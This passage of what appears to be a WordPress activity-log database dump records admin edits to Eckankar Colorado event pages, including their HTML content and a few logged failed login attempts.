href=\"https://spiritualexperience.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://spiritualexperience.org/</a></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Book</strong>:</span><br>\n<span style=\"font-size: 14pt;\">‘<em>Spiritual Experiences Guidebook</em>‘</span><br>\n<span style=\"font-size: 14pt;\">by Harold Klemp</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This interactive book and CD answer questions and validate spiritual experiences for people of all faiths.</span><br>\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/items/-1512-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckbooks.org/items/-1512-0.html</a></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Table of Contents - ‘<em>Spiritual Experiences Guidebook</em>‘:&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckbooks.org/content/pdf/Spir_Exp_Guide_TOC.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckbooks.org/content/pdf/Spir_Exp_Guide_TOC.pdf</a></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For a&nbsp;<strong>free book</strong>&nbsp;and CD, go to:</span><br>\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://spiritualexperience.org/guidebook-download-form/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://spiritualexperience.org/guidebook-download-form/</a></span><br>\n<span style=\"font-size: 14pt;\">or you can call</span><br>\n<span style=\"font-size: 14pt;\">1-888-LOVE-GOD (1-888-568-3463)</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">——</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The&nbsp;<strong>inner</strong>&nbsp;<strong>worlds</strong>:</span><br>\n<span style=\"font-size: 14pt;\">The Worlds can best be described as planes of reality. Each plane corresponds to a certain state of consciousness and vibration.</span><br>\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckankar.org/the-god-worlds-of-eck/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckankar.org/the-god-worlds-of-eck/</a></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Web page for this SEGAMeetup:</span><br>\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.meetup.com/segofaurora/events/296051211/\" target=\"_blank\" rel=\"noopener\">https://www.meetup.com/segofaurora/events/296051211/</a></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGAM Zoom video | conference call Meetup will be on Wednesday, November 1st at 7:00 p.m. We will discuss ‘<a class=\"!text-viridian\" href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Finding Your Lifes Purpose</a>’.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://meetup.com/SEGofAurora/events\" target=\"_blank\" rel=\"noopener\">http://meetup.com/SEGofAurora/events</a></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by</span><br>\n<span style=\"font-size: 14pt;\">ECKANKAR</span><br>\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">http://www.eckankar-colorado.org</a></span></p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/296051211/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n</div>\n</div>\n</div>\n</div>'),(213132,35041,'post_type','mec-events'),(213133,35041,'post_title','Spiritual Experiences'),(213131,35041,'post_id','269111'),(213130,35040,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269111&action=edit'),(213128,35040,'_user_email','nadazipought@zilch.org'),(213129,35040,'_server_remote_addr','174.16.128.x'),(213127,35040,'_user_login','john-admin-96'),(213126,35040,'_user_id','15'),(213125,35040,'_message_key','attachment_created'),(213123,35040,'attachment_parent_title','Spiritual Experiences'),(213124,35040,'attachment_parent_post_type','mec-events'),(213122,35040,'attachment_parent_id','269111'),(213121,35040,'attachment_filesize','24452'),(213120,35040,'attachment_mime','image/webp'),(213119,35040,'attachment_filename','PathToGod.webp'),(213117,35040,'attachment_id','269112'),(213118,35040,'attachment_title','PathToGod'),(213116,35040,'post_type','attachment'),(213115,35039,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269111&action=edit'),(213114,35039,'_server_remote_addr','174.16.128.x'),(213112,35039,'_user_login','john-admin-96'),(213113,35039,'_user_email','nadazipought@zilch.org'),(213111,35039,'_user_id','15'),(213110,35039,'_message_key','post_updated'),(213109,35039,'post_meta_added','78'),(213108,35039,'post_title','Spiritual Experiences'),(213106,35039,'post_id','269111'),(213107,35039,'post_type','mec-events'),(213105,35038,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269111&action=edit'),(213104,35038,'_server_remote_addr','174.16.128.x'),(213103,35038,'_user_email','nadazipought@zilch.org'),(213101,35038,'_user_id','15'),(213102,35038,'_user_login','john-admin-96'),(213100,35038,'_message_key','post_updated'),(213099,35038,'post_meta_added','78'),(213098,35038,'post_title','Spiritual Experiences'),(213097,35038,'post_type','mec-events'),(213096,35038,'post_id','269111'),(213095,35037,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269111&action=edit'),(213094,35037,'_server_remote_addr','174.16.128.x'),(213093,35037,'_user_email','nadazipought@zilch.org'),(213092,35037,'_user_login','john-admin-96'),(213090,35037,'_message_key','post_updated'),(213091,35037,'_user_id','15'),(213089,35037,'post_meta_added','78'),(213088,35037,'post_title','Copy of MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(213086,35037,'post_id','269111'),(213087,35037,'post_type','mec-events'),(213085,35036,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269111&action=edit'),(213084,35036,'_server_remote_addr','174.16.128.x'),(213083,35036,'_user_email','nadazipought@zilch.org'),(213081,35036,'_user_id','15'),(213082,35036,'_user_login','john-admin-96'),(213080,35036,'_message_key','post_updated'),(213079,35036,'post_meta_added','78'),(213077,35036,'post_type','mec-events'),(213078,35036,'post_title','Copy of MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(213076,35036,'post_id','269111'),(213075,35035,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=90768e5abb&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=09%2F23%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=09%2F23%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(213074,35035,'_server_remote_addr','174.16.128.x'),(213073,35035,'_user_email','nadazipought@zilch.org'),(213072,35035,'_user_login','john-admin-96'),(213071,35035,'_user_id','15'),(213070,35035,'_message_key','post_updated'),(213069,35035,'post_title','Copy of MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(213068,35035,'post_type','mec-events'),(213067,35035,'post_id','269111'),(213065,35034,'_server_remote_addr','181.176.174.x'),(213066,35034,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(213064,35034,'_message_key','user_unknown_login_failed'),(213062,35034,'failed_username','admin'),(213063,35034,'server_http_user_agent','Mozilla/5.0 (Linux; Android 11; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(213061,35033,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(213060,35033,'_server_remote_addr','45.66.105.x'),(213059,35033,'_message_key','user_unknown_login_failed'),(213058,35033,'server_http_user_agent','Mozilla/5.0 (Linux; Android 10; SM-G986U Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36'),(213057,35033,'failed_username','info@eckankar-colorado.org'),(213055,35032,'_server_remote_addr','174.16.128.x'),(213056,35032,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269109&action=edit'),(213054,35032,'_user_email','nadazipought@zilch.org'),(213053,35032,'_user_login','john-admin-96'),(213052,35032,'_user_id','15'),(213051,35032,'_message_key','post_updated'),(213049,35032,'post_new_thumb_id','266410'),(213050,35032,'post_new_thumb_title','sunset-horizon-2'),(213048,35032,'post_prev_thumb_title','bird-sky-1'),(213047,35032,'post_prev_thumb_id','266160'),(213046,35032,'post_new_post_date_gmt','2023-09-22 01:19:00'),(213045,35032,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(213044,35032,'post_new_post_date','2023-09-21 19:19:00'),(213043,35032,'post_prev_post_date','2023-09-21 19:15:37'),(213042,35032,'post_new_post_status','publish'),(213041,35032,'post_prev_post_status','draft'),(213040,35032,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">A Secret to Spiritual Living</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\"><strong>Would you like to handle the ups and downs of life with more grace?</strong></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>Are you looking for a greater connection to the divine?</strong></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>Are you ready to recognize the hand of God in your life and gratefully accept what comes your way?</strong></span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this spiritual event is for you. You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"The daily struggles that life presents are opportunities to cultivate spiritual grace.\" --Harold Klemp,&nbsp;<em>The Awakening Soul,</em>&nbsp;p 31</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please Register to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213039,35032,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">A Secret to Spiritual Living</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\"><strong>Would you like to handle the ups and downs of life with more grace?</strong></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>Are you looking for a greater connection to the divine?</strong></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>Are you ready to recognize the hand of God in your life and gratefully accept what comes your way?</strong></span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this spiritual event is for you. You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"The daily struggles that life presents are opportunities to cultivate spiritual grace.\" --Harold Klemp,&nbsp;<em>The Awakening Soul,</em>&nbsp;p 31</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar</a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213038,35032,'post_title','The Power of Grace'),(213037,35032,'post_type','mec-events'),(213036,35032,'post_id','269109'),(213035,35031,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269109&action=edit'),(213034,35031,'_server_remote_addr','174.16.128.x'),(213033,35031,'_user_email','nadazipought@zilch.org'),(213032,35031,'_user_login','john-admin-96'),(213031,35031,'_user_id','15'),(213029,35031,'post_new_post_date','2023-09-21 19:15:37'),(213030,35031,'_message_key','post_updated'),(213028,35031,'post_prev_post_date','2023-09-21 19:11:22'),(213027,35031,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">A Secret to Spiritual Living</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\"><strong>Would you like to handle the ups and downs of life with more grace?</strong></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>Are you looking for a greater connection to the divine?</strong></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>Are you ready to recognize the hand of God in your life and gratefully accept what comes your way?</strong></span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this spiritual event is for you. You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"The daily struggles that life presents are opportunities to cultivate spiritual grace.\" --Harold Klemp,&nbsp;<em>The Awakening Soul,</em>&nbsp;p 31</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar</a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213026,35031,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">Tagline Goes Here</span></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213025,35031,'post_new_post_title','The Power of Grace'),(213024,35031,'post_prev_post_title','Copy of ECK LIGHT & SOUND TEMPLATE-In Person & Online-CONTAINS REGISTRATION | Benefit Title goes here'),(213023,35031,'post_title','The Power of Grace'),(213022,35031,'post_type','mec-events'),(213021,35031,'post_id','269109'),(213020,35030,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=90768e5abb&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=09%2F23%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=09%2F23%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(213019,35030,'_server_remote_addr','174.16.128.x'),(213017,35030,'_user_login','john-admin-96'),(213018,35030,'_user_email','nadazipought@zilch.org'),(213016,35030,'_user_id','15'),(213015,35030,'_message_key','post_updated'),(213013,35030,'post_type','mec-events'),(213014,35030,'post_title','Copy of ECK LIGHT &#038; SOUND TEMPLATE-In Person &#038; Online-CONTAINS REGISTRATION | Benefit Title goes here'),(213012,35030,'post_id','269109'),(213011,35029,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269107&action=edit'),(213010,35029,'_server_remote_addr','174.16.128.x'),(213008,35029,'_user_login','john-admin-96'),(213009,35029,'_user_email','nadazipought@zilch.org'),(213007,35029,'_user_id','15'),(213006,35029,'_message_key','post_updated'),(213005,35029,'post_new_post_date_gmt','2023-09-22 01:10:19'),(213004,35029,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(213003,35029,'post_new_post_date','2023-09-21 19:10:19'),(213002,35029,'post_prev_post_date','2023-09-21 19:09:55'),(213001,35029,'post_new_post_status','publish'),(212999,35029,'post_title','How to Enliven Every Aspect of Your Life'),(213000,35029,'post_prev_post_status','draft'),(212998,35029,'post_type','mec-events'),(212997,35029,'post_id','269107'),(212995,35028,'_server_remote_addr','174.16.128.x'),(212996,35028,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269107&action=edit'),(212994,35028,'_user_email','nadazipought@zilch.org'),(212993,35028,'_user_login','john-admin-96'),(212992,35028,'_user_id','15'),(212990,35028,'post_new_thumb_title','HUFlowers'),(212991,35028,'_message_key','post_updated'),(212989,35028,'post_new_thumb_id','268485'),(212988,35028,'post_new_post_date','2023-09-21 19:09:55'),(212987,35028,'post_prev_post_date','2023-09-21 19:07:29'),(212985,35028,'post_type','mec-events'),(212986,35028,'post_title','How to Enliven Every Aspect of Your Life'),(212984,35028,'post_id','269107'),(212983,35027,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269107&action=edit'),(212981,35027,'_user_email','nadazipought@zilch.org'),(212982,35027,'_server_remote_addr','174.16.128.x'),(212980,35027,'_user_login','john-admin-96'),(212979,35027,'_user_id','15'),(212978,35027,'_message_key','post_updated'),(212976,35027,'post_prev_post_date','2023-09-21 19:02:13'),(212977,35027,'post_new_post_date','2023-09-21 19:07:29'),(243261,41220,'_user_email','nadazipought@zilch.org'),(243262,41220,'_server_remote_addr','184.96.219.x'),(243263,41220,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269412&action=edit'),(243264,41221,'_user_id','2'),(243265,41221,'_user_login','S8zhaBda'),(243266,41221,'_user_email','nada@zipnadanot.org'),(243267,41221,'_message_key','user_logged_out'),(243268,41221,'_server_remote_addr','76.130.120.x'),(243269,41221,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(243270,41222,'post_id','269412'),(243271,41222,'post_type','mec-events'),(243272,41222,'post_title','How Can I Listen to Divine Guidance?'),(243273,41222,'post_prev_post_title','ECK LIGHT & SOUND SERVICE - How Can I Listen to Divine Guidance?'),(243274,41222,'post_new_post_title','How Can I Listen to Divine Guidance?'),(243275,41222,'post_prev_post_date','2023-11-21 09:38:04'),(243276,41222,'post_new_post_date','2023-11-21 09:39:23'),(243277,41222,'_message_key','post_updated'),(243278,41222,'_user_id','15'),(243279,41222,'_user_login','john-admin-96'),(243280,41222,'_user_email','nadazipought@zilch.org'),(243281,41222,'_server_remote_addr','184.96.219.x'),(243282,41222,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269412&action=edit'),(243283,41223,'post_id','269412'),(243284,41223,'post_type','mec-events'),(243285,41223,'post_title','How Can I Listen to Divine Guidance?'),(243286,41223,'post_new_thumb_id','269414'),(243287,41223,'post_new_thumb_title','Butterfly2'),(243288,41223,'post_meta_added','79'),(243289,41223,'_message_key','post_updated'),(243290,41223,'_user_id','15'),(243291,41223,'_user_login','john-admin-96'),(243292,41223,'_user_email','nadazipought@zilch.org'),(243293,41223,'_server_remote_addr','184.96.219.x'),(243294,41223,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269412&action=edit'),(243295,41224,'post_id','269412'),(243296,41224,'post_type','mec-events'),(243297,41224,'post_title','How Can I Listen to Divine Guidance?'),(243298,41224,'post_prev_post_name',''),(243299,41224,'post_new_post_name','how-can-i-listen-to-divine-guidance'),(243300,41224,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">How Can I Listen to Divine Guidance?</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover the secrets of tapping into divine wisdom to get the help you need in your daily life.</strong></span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you want to connect to the Divine within you?</strong></span></p>\n</li>\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you need help understanding what your nudges are telling you?</strong></span></p>\n</li>\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a larger room spiritually?</strong></span></p>\n</li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this ECK Light &amp; Sound Service is for you.</span></p>\n<blockquote class=\"\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes the Holy Spirit may work in a gentle way. It may give you just a nudge, a feeling of how to act, what to do.” Harold Klemp,&nbsp;<em>Love the Keystone of Life</em>, p. 77</span></p>\n</blockquote>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(243301,41224,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">How 